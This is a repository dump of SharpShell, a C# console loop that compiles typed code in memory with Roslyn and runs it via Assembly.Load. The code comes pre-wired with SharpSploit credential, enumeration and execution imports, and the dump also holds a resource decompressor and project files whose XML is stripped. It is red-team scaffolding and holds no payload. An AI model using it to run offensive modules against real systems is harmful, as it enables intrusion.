| /// 11 | /// CountdownEvent is used for counting Asynchronous operations 12 | /// 13 | /// 14 | /// Adapted from https://stackoverflow.com/questions/6790499 15 | /// 16 | public sealed class CountdownEvent : IDisposable 17 | { 18 | private readonly ManualResetEvent _countEvent = new ManualResetEvent(false); 19 | private readonly ManualResetEvent _reachedCountEvent = new ManualResetEvent(false); 20 | private volatile int _maxCount; 21 | private volatile int _currentCount = 0; 22 | private volatile bool _isDisposed = false; 23 | 24 | public CountdownEvent(int count) 25 | { 26 | this._maxCount = count; 27 | } 28 | 29 | public bool Signal() 30 | { 31 | if (this._isDisposed) 32 | { 33 | return false; 34 | } 35 | if (this._currentCount >= this._maxCount) 36 | { 37 | return true; 38 | } 39 | if (Interlocked.Increment(ref _currentCount) >= this._maxCount) 40 | { 41 | _reachedCountEvent.Set(); 42 | return true; 43 | } 44 | _countEvent.Set(); 45 | return false; 46 | } 47 | 48 | public bool Wait(int timeout = Timeout.Infinite) 49 | { 50 | if (this._isDisposed) 51 | { 52 | return false; 53 | } 54 | return _reachedCountEvent.WaitOne(timeout); 55 | } 56 | 57 | public bool WaitOne(int timeout = Timeout.Infinite) 58 | { 59 | if (this._isDisposed) 60 | { 61 | return false; 62 | } 63 | return _countEvent.WaitOne(timeout); 64 | } 65 | 66 | public void Dispose() 67 | { 68 | this.Dispose(true); 69 | GC.SuppressFinalize(this); 70 | } 71 | 72 | public void Dispose(bool disposing) 73 | { 74 | if (!this._isDisposed) 75 | { 76 | if (disposing) 77 | { 78 | ((IDisposable)_reachedCountEvent).Dispose(); 79 | ((IDisposable)_countEvent).Dispose(); 80 | } 81 | this._isDisposed = true; 82 | } 83 | } 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Misc/Utilities.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.IO.Compression; 7 | using System.Linq; 8 | using System.Reflection; 9 | 10 | namespace SharpSploit.Misc 11 | { 12 | public static class Utilities 13 | { 14 | private static string[] manifestResources = Assembly.GetExecutingAssembly().GetManifestResourceNames(); 15 | 16 | public static byte[] GetEmbeddedResourceBytes(string resourceName) 17 | { 18 | string resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName + ".comp")); 19 | if (resourceFullName != null) 20 | { 21 | return Decompress(Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully()); 22 | } 23 | else if ((resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName))) != null) 24 | { 25 | return Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully(); 26 | } 27 | return null; 28 | } 29 | 30 | public static byte[] ReadFully(this Stream input) 31 | { 32 | byte[] buffer = new byte[16 * 1024]; 33 | using (MemoryStream ms = new MemoryStream()) 34 | { 35 | int read; 36 | while((read = input.Read(buffer, 0, buffer.Length)) > 0) 37 | { 38 | ms.Write(buffer, 0, read); 39 | } 40 | return ms.ToArray(); 41 | } 42 | } 43 | 44 | public static byte[] Compress(byte[] Bytes) 45 | { 46 | byte[] compressedBytes; 47 | using (MemoryStream memoryStream = new MemoryStream()) 48 | { 49 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 50 | { 51 | deflateStream.Write(Bytes, 0, Bytes.Length); 52 | } 53 | compressedBytes = memoryStream.ToArray(); 54 | } 55 | return compressedBytes; 56 | } 57 | 58 | public static byte[] Decompress(byte[] compressed) 59 | { 60 | using (MemoryStream inputStream = new MemoryStream(compressed.Length)) 61 | { 62 | inputStream.Write(compressed, 0, compressed.Length); 63 | inputStream.Seek(0, SeekOrigin.Begin); 64 | using (MemoryStream outputStream = new MemoryStream()) 65 | { 66 | using (DeflateStream deflateStream = new DeflateStream(inputStream, CompressionMode.Decompress)) 67 | { 68 | byte[] buffer = new byte[4096]; 69 | int bytesRead; 70 | while ((bytesRead = deflateStream.Read(buffer, 0, buffer.Length)) != 0) 71 | { 72 | outputStream.Write(buffer, 0, bytesRead); 73 | } 74 | } 75 | return outputStream.ToArray(); 76 | } 77 | } 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /SharpShell/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpShell")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpShell")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("bdba47c5-e823-4404-91d0-7f6561279525")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpShell/SharpShell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Linq; 8 | using System.Reflection; 9 | using System.Collections.Generic; 10 | 11 | using YamlDotNet.Serialization; 12 | using Microsoft.CodeAnalysis; 13 | 14 | namespace SharpShell 15 | { 16 | class SharpShell 17 | { 18 | public static string WrapperFunctionFormat = 19 | @"using System; 20 | using System.IO; 21 | using System.Linq; 22 | using System.Text; 23 | using System.Security; 24 | using System.Security.Principal; 25 | using System.Collections.Generic; 26 | {0} 27 | 28 | using SharpSploit.Credentials; 29 | using SharpSploit.Enumeration; 30 | using SharpSploit.Execution; 31 | using SharpSploit.Generic; 32 | using SharpSploit.Misc; 33 | 34 | public static class {1} 35 | {{ 36 | public static object Execute() 37 | {{ 38 | {2} 39 | }} 40 | }} 41 | "; 42 | 43 | static void Main(string[] args) 44 | { 45 | bool printPrompt = true; 46 | List UsingImports = new List(); 47 | List lines = new List(); 48 | Compiler compiler = new Compiler(); 49 | while (true) 50 | { 51 | // Display Prompt 52 | if (printPrompt) 53 | { 54 | Console.Write("SharpShell > "); 55 | } 56 | else 57 | { 58 | Console.Write(">>> "); 59 | } 60 | 61 | // Read Input 62 | string line = Console.ReadLine(); 63 | 64 | // SharpShell Special Commands 65 | if (line.Trim().ToLower() == "exit" || line.Trim().ToLower() == "quit") 66 | { 67 | return; 68 | } 69 | else if (line.Trim() == "") 70 | { 71 | continue; 72 | } 73 | else if (line.Trim().EndsWith("\\")) 74 | { 75 | printPrompt = false; 76 | lines.Add(line.TrimEnd('\\')); 77 | continue; 78 | } 79 | else if (line.Trim().StartsWith("using ") && line.Trim().Split(' ').Length == 2 && line.Trim().EndsWith(";")) 80 | { 81 | Console.WriteLine("Import:\"" + line.Trim() + "\" now being used."); 82 | UsingImports.Add(line.Trim()); 83 | continue; 84 | } 85 | 86 | try 87 | { 88 | // Concatenation 89 | printPrompt = true; 90 | string source = String.Join(Environment.NewLine, lines.ToArray()); 91 | lines.Clear(); 92 | source = source + Environment.NewLine + line; 93 | if (!source.Contains("return ")) 94 | { 95 | source = "return " + source; 96 | } 97 | 98 | // Compilation 99 | string ClassName = RandomString(); 100 | 101 | Compiler.CompilationRequest request = new Compiler.CompilationRequest 102 | { 103 | Source = String.Format(WrapperFunctionFormat, String.Join(Environment.NewLine, UsingImports.ToArray()), ClassName, source), 104 | AssemblyName = "SharpShell", 105 | Optimize = true, 106 | TargetDotNetVersion = Compiler.DotNetVersion.Net35, 107 | OutputKind = OutputKind.DynamicallyLinkedLibrary, 108 | Platform = Platform.AnyCpu, 109 | SourceDirectory = Common.SharpShellSourceDirectory, 110 | ResourceDirectory = Common.SharpShellResourcesDirectory, 111 | ReferenceDirectory = Common.SharpShellReferencesDirectory 112 | }; 113 | 114 | using (TextReader reader = File.OpenText(Common.SharpShellReferencesConfig)) 115 | { 116 | var deserializer = new DeserializerBuilder().Build(); 117 | request.References = deserializer.Deserialize>(reader) 118 | .Where(R => R.Framework == request.TargetDotNetVersion) 119 | .Where(R => R.Enabled) 120 | .ToList(); 121 | } 122 | using (TextReader reader = File.OpenText(Common.SharpShellResourcesConfig)) 123 | { 124 | var deserializer = new DeserializerBuilder().Build(); 125 | request.EmbeddedResources = deserializer.Deserialize>(reader) 126 | .Where(ER => ER.Enabled) 127 | .ToList(); 128 | } 129 | byte[] assemblyBytes = Compiler.Compile(request); 130 | 131 | // Execution 132 | Assembly assembly = Assembly.Load(assemblyBytes); 133 | object result = assembly.GetType(ClassName).GetMethod("Execute").Invoke(null, null); 134 | Console.WriteLine(result.ToString()); 135 | } 136 | catch (CompilerException e) 137 | { 138 | Console.Error.WriteLine(e.Message); 139 | } 140 | catch (Exception e) 141 | { 142 | Console.Error.WriteLine("RuntimeException: " + e.Message + e.StackTrace); 143 | } 144 | } 145 | } 146 | 147 | private static Random random = new Random(); 148 | private static string RandomString() 149 | { 150 | const string alphachars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 151 | const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; 152 | return alphachars[random.Next(alphachars.Length)] + new string(Enumerable.Repeat(chars, random.Next(10, 30)).Select(s => s[random.Next(s.Length)]).ToArray()); 153 | } 154 | } 155 | } 156 | -------------------------------------------------------------------------------- /SharpShell/SharpShell.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {BDBA47C5-E823-4404-91D0-7F6561279525} 8 | Exe 9 | SharpShell 10 | SharpShell 11 | v4.6 12 | 512 13 | true 14 | 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | ..\packages\Microsoft.CodeAnalysis.Common.2.9.0\lib\netstandard1.3\Microsoft.CodeAnalysis.dll 38 | 39 | 40 | ..\packages\Microsoft.CodeAnalysis.CSharp.2.9.0\lib\netstandard1.3\Microsoft.CodeAnalysis.CSharp.dll 41 | 42 | 43 | 44 | ..\packages\System.AppContext.4.3.0\lib\net46\System.AppContext.dll 45 | 46 | 47 | ..\packages\System.Collections.Immutable.1.5.0\lib\netstandard1.3\System.Collections.Immutable.dll 48 | 49 | 50 | 51 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll 52 | 53 | 54 | 55 | 56 | ..\packages\System.Diagnostics.FileVersionInfo.4.3.0\lib\net46\System.Diagnostics.FileVersionInfo.dll 57 | 58 | 59 | ..\packages\System.Diagnostics.StackTrace.4.3.0\lib\net46\System.Diagnostics.StackTrace.dll 60 | 61 | 62 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll 63 | 64 | 65 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll 66 | 67 | 68 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll 69 | 70 | 71 | 72 | ..\packages\System.Reflection.Metadata.1.6.0\lib\portable-net45+win8\System.Reflection.Metadata.dll 73 | 74 | 75 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net46\System.Security.Cryptography.Algorithms.dll 76 | 77 | 78 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll 79 | 80 | 81 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll 82 | 83 | 84 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net46\System.Security.Cryptography.X509Certificates.dll 85 | 86 | 87 | ..\packages\System.Text.Encoding.CodePages.4.3.0\lib\net46\System.Text.Encoding.CodePages.dll 88 | 89 | 90 | ..\packages\System.Threading.Tasks.Extensions.4.3.0\lib\portable-net45+win8+wp8+wpa81\System.Threading.Tasks.Extensions.dll 91 | 92 | 93 | ..\packages\System.Threading.Thread.4.3.0\lib\net46\System.Threading.Thread.dll 94 | 95 | 96 | ..\packages\System.ValueTuple.4.3.0\lib\netstandard1.0\System.ValueTuple.dll 97 | 98 | 99 | 100 | 101 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll 102 | 103 | 104 | ..\packages\System.Xml.XmlDocument.4.3.0\lib\net46\System.Xml.XmlDocument.dll 105 | 106 | 107 | ..\packages\System.Xml.XPath.4.3.0\lib\net46\System.Xml.XPath.dll 108 | 109 | 110 | ..\packages\System.Xml.XPath.XDocument.4.3.0\lib\net46\System.Xml.XPath.XDocument.dll 111 | 112 | 113 | ..\packages\YamlDotNet.5.2.1\lib\net45\YamlDotNet.dll 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /SharpShell/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | --------------------------------------------------------------------------------